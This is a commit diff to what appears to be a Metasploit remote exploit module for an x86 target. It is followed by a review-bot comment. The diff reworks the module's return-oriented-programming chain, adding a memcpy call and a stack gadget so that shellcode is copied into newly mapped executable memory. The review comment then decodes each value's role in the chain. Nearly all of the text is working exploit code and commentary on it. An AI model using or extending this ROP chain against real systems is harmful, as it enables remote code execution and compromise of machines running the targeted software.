add memcpy to the ropchain due to the zeroed mmap function under ubuntu
parent
baf1ce22b3
commit
6b639ad2ee
|
@ -34,13 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'mmap' => [
|
'mmap' => [
|
||||||
0x0816f768, #mmap_64@plt
|
0x0816f768, #mmap_64@plt
|
||||||
0x0c0c0c0c, #NOPSLED+SHELLCODE
|
0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
|
||||||
0x0c0c0000,
|
0x0c0c0000,
|
||||||
0x00010000,
|
0x00002000,
|
||||||
0x00000007,
|
0x00000007,
|
||||||
0x00000031,
|
0x00000031,
|
||||||
0xffffffff,
|
0xffffffff,
|
||||||
0x00000000,
|
0x00000000,
|
||||||
|
0x78696761,
|
||||||
|
0x0816e4c8, #memcpy@plt
|
||||||
|
0x0c0c0c0c,
|
||||||
|
0x0c0c0000,
|
||||||
|
0x0c0b0000,
|
||||||
|
0x00002000
|
||||||
],
|
],
|
||||||
'ret' => [0x08055a70], #ret
|
'ret' => [0x08055a70], #ret
|
||||||
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
|
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
|
||||||
|
|
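Review bot: The dwords added to the `'mmap'` array are bare magic numbers, and the only comment that explained `0x0c0c0c0c` (`#NOPSLED+SHELLCODE`) was removed together with the line it sat on, so the array can no longer be read without the target binary at hand. Each new entry should state its role: `0x78696761` appears to be filler that the `add esp, 0x14 / pop ebx / pop ebp / ret` gadget skips along with the six mmap arguments, and the three values after the second `0x0c0c0c0c` look like memcpy's destination, source and length (the length matching the new mmap size `0x00002000`); confirm this and comment it, e.g. `0x00002000 # memcpy length, same as the mmap length above`. `0x8666d07` is written with seven hex digits while every other address is zero-padded to eight; `0x08666d07` keeps the column consistent. Because every address here is tied to one build of the target, a comment naming the binary and version these offsets were taken from would let a maintainer tell when they stop applying. The enclosing target hash begins and ends outside this hunk.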